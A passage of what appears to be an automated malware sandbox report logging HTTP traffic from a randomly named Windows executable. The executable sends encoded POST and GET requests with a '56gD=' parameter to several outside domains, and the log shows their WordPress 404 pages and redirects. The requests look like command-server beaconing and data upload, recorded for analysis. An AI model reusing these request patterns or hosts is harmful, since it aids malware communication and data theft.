                  Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                  Sep 4, 2024 09:38:02.416157007 CEST | 672 | IN | Data Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                  Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                  Sep 4, 2024 09:38:02.416169882 CEST | 1236 | IN | Data Raw: 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d
                  Data Ascii: rker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
                  Sep 4, 2024 09:38:02.416179895 CEST | 1236 | IN | Data Raw: 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63
                  Data Ascii: 9999px}</style><style id='wp-block-site-title-inline-css'>:root :where(.wp-block-site-title a){color:inherit}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-lay
                  Sep 4, 2024 09:38:02.416191101 CEST | 1236 | IN | Data Raw: 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 31 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d
                  Data Ascii: =writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([sty
                  Sep 4, 2024 09:38:02.416203022 CEST | 1236 | IN | Data Raw: 2e 36 38 34 68 31 2e 37 33 37 5a 27 29 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2a 20 48 69 64 65 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 69 66 20 74 68 65 20 68 65 61 64 69 6e 67
                  Data Ascii: .684h1.737Z');display: block;}/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;
                  Sep 4, 2024 09:38:02.416213036 CEST | 1236 | IN | Data Raw: 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f
                  Data Ascii: right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-search-inline-css'>.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{h
                  Sep 4, 2024 09:38:02.416224003 CEST | 1236 | IN | Data Raw: 68 5f 5f 73 65 61 72 63 68 66 69 65 6c 64 2d 68 69 64 64 65 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: h__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-bloc
                  Sep 4, 2024 09:38:02.416235924 CEST | 1236 | IN | Data Raw: 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69
                  Data Ascii: lock-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:right}</style><style id='wp-block-columns-inline-css'>.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  35 | 192.168.2.4 | 49772 | 162.55.254.209 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:04.207552910 CEST | 10859 | OUT | POST /qpwk/ HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.anaidittrich.com
                  Referer: http://www.anaidittrich.com/qpwk/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 51 49 2b 48 6c 32 72 49 37 69 71 42 4f 4c 47 30 37 6a 63 4f 57 7a 51 52 45 63 6b 47 4a 36 62 41 38 35 78 77 67 68 65 76 65 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2b 36 71 72 53 6f 4a 79 51 4b 31 32 4c 74 49 49 6f 51 71 48 56 6f 42 70 53 79 58 63 2b 6f 50 52 66 71 44 34 30 39 6b 79 38 36 4c 4f 43 58 52 68 57 57 77 33 56 69 75 69 62 50 59 77 54 6b 36 4e 43 4e 30 30 73 49 48 5a 56 69 56 38 30 2b 34 31 5a 37 [TRUNCATED]
                  Data Ascii: 56gD= [TRUNCATED]
                  Sep 4, 2024 09:38:05.124836922 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:04 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                  Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                  Sep 4, 2024 09:38:05.124869108 CEST | 224 | IN | Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                  Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht
                  Sep 4, 2024 09:38:05.124877930 CEST | 1236 | IN | Data Raw: 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20
                  Data Ascii: gefunden. - Anai Dittrich Art, Design, Care</title><link rel='dns-prefetch' href='//anaidittrich.com' /><link rel="alternate" type="application/rss+xml" title="Anai Dittrich Art, Design, Care &raquo; Feed" href="http://anaidittrich.
                  Sep 4, 2024 09:38:05.125013113 CEST | 1236 | IN | Data Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22
                  Data Ascii: unction(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\
                  Sep 4, 2024 09:38:05.125025034 CEST | 1236 | IN | Data Raw: 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79
                  Data Ascii: number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof
                  Sep 4, 2024 09:38:05.125036955 CEST | 1236 | IN | Data Raw: 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 7b 64 69
                  Data Ascii: >.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-sit
                  Sep 4, 2024 09:38:05.125052929 CEST | 896 | IN | Data Raw: 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 09 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09
                  Data Ascii: vertical-align: middle;text-decoration: none;display: inline-block;}</style><link rel='stylesheet' id='wp-block-navigation-css' href='http://anaidittrich.com/wp-includes/blocks/navigation/style.min.css?ver=6.6.1' media='all'
                  Sep 4, 2024 09:38:05.125092983 CEST | 1236 | IN | Data Raw: 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 34 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b
                  Data Ascii: ]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-
                  Sep 4, 2024 09:38:05.125102997 CEST | 1236 | IN | Data Raw: 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 72 74 6c 20 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 2e 68 61 73 2d 74 65
                  Data Ascii: n-right:before {margin-left: auto;}.rtl .is-style-asterisk.has-text-align-left:before {margin-right: auto;}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-s
                  Sep 4, 2024 09:38:05.125112057 CEST | 1236 | IN | Data Raw: 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 61 75 74 6f 3b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 77
                  Data Ascii: r{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:un
                  Sep 4, 2024 09:38:05.125497103 CEST | 1236 | IN | Data Raw: 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65
                  Data Ascii: ere(.wp-block-search__input){font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  36 | 192.168.2.4 | 49773 | 162.55.254.209 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:06.743510962 CEST | 485 | OUT | GET /qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:07.401604891 CEST | 487 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Wed, 04 Sep 2024 07:38:07 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  X-Redirect-By: WordPress
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Location: http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  37 | 192.168.2.4 | 49774 | 64.64.237.133 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:12.932461977 CEST | 748 | OUT | POST /0or4/ HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.551108k5.shop
                  Referer: http://www.551108k5.shop/0or4/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=NrV3WXumKEYrIbumllVcUqHCyr+EZyf0rps8hRZ5qZSvR0m4BJ5sY6TscSgnJKhePYVpZabP6kKtqd/JdPTGMxlORuWSokshbgApcJaN+uTXsTsrHs9Gz8VK7r4QDbEV9iVuG/6iwEStFfJgPV7pHACeophwTZoheR7WN2QwZRkCeuiaEta7ENlbk2aOqzhsqg==
                  Sep 4, 2024 09:38:13.501923084 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:13 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  38 | 192.168.2.4 | 49775 | 64.64.237.133 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:15.647413969 CEST | 768 | OUT | POST /0or4/ HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.551108k5.shop
                  Referer: http://www.551108k5.shop/0or4/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=NrV3WXumKEYrJ7emnGNcTKHd3r+EQSfwroQ8hQtPqL2vRW+4AKhsf6TsJigoUahRPYYcZbnP6gitqfnJc4HHMhl2I+Wc10shbgApcIqj+u7XticrGIpJ6cVNsb4QSLFc9iVMG+nFwGqtFdBgPhnqewCclJgcdMV1RCWYIlwpcg4YWIzAVc7sWNBo5xT6nwclxnAG5lXyn/ScaIoY/hTaJBw=
                  Sep 4, 2024 09:38:16.370214939 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:16 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                  Sep 4, 2024 09:38:16.681391001 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:16 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  39 | 192.168.2.4 | 49776 | 64.64.237.133 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:18.237430096 CEST | 10850 | OUT | POST /0or4/ HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.551108k5.shop
                  Referer: http://www.551108k5.shop/0or4/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=… [TRUNCATED]
                  Sep 4, 2024 09:38:18.803133011 CEST | 401 | IN | HTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:18 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  40 | 192.168.2.4 | 49777 | 64.64.237.133 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:20.780143023 CEST | 482 | OUT | GET /0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:21.370971918 CEST | 540 | IN | HTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:21 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/?56gD=Ap9XVhmqGkofKqiWnW9mL5/l5ZSEUCfyrZ4yzU5Yy+i7TWDOWZwNJN7AITR5XrxbOYEdZ4fD4Uqd39DYFcK8F05zK8C70DAcVzFic5Orq8iLvChdOek9rdc=&gTSpc=Khb8pT
                  Strict-Transport-Security: max-age=31536000
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  41 | 192.168.2.4 | 49778 | 85.13.151.9 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:26.440450907 CEST | 769 | OUT | POST /gs9g/ HTTP/1.1
                  Host: www.datensicherung.email
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.datensicherung.email
                  Referer: http://www.datensicherung.email/gs9g/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Ascii: 56gD=4v8DtKRH15LAOPGxT3MxNOFfYBPp+TvB2hGsVGIl7RwFlAUpYC62EdqJ9A4xTWZb2hpwTPVtnx1BOPV8amBJ9u2DW6WS0kamOD7vPwW2K3WTBQY4lbQobs3GrlFuPqKwqjQdWVccDsrCLkMdmlnRCio8Ld+BWPYYlTYqC5oOycG1v3/TjwYi20drd3yqxvhUwg==
                  Sep 4, 2024 09:38:27.086182117 CEST | 360 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:26 GMT
                  Server: Apache
                  Content-Length: 196
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
